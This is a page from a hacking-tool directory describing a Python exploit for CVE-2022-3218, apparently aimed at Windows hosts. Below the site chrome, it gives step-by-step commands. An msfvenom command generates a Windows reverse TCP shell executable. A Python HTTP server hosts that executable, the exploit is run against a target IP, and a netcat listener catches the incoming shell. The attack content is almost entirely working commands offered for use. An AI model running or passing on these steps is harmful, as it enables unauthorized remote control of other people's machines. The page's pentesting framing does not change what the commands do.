Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/moisestapia/cve-2022-3218
Payload GenerationExploitationShellcodePenetration TestingCommand and ControlRemote Access Tool
GitHubmoisestapia/cve-2022-3218

cve-2022-3218

Python exploit for CVE-2022-3218 that generates a reverse TCP payload via msfvenom and delivers it over HTTP to a target Windows host.

View Repository
28 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Step 1 — Create a REAL payload (Windows)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.5.50 LPORT=4444 -f exe -o exploit.exe

Step 2 — Serve the payload via HTTP In the same directory: python3 -m http.server 80

Step 3 — Adjust the exploit

Run like this:

python3 CVE-2022-3218.py 172.20.7.185 10.8.5.50 exploit.exe

Step 4 — Listener BEFORE exploiting nc -lvnp 4444

Download Tool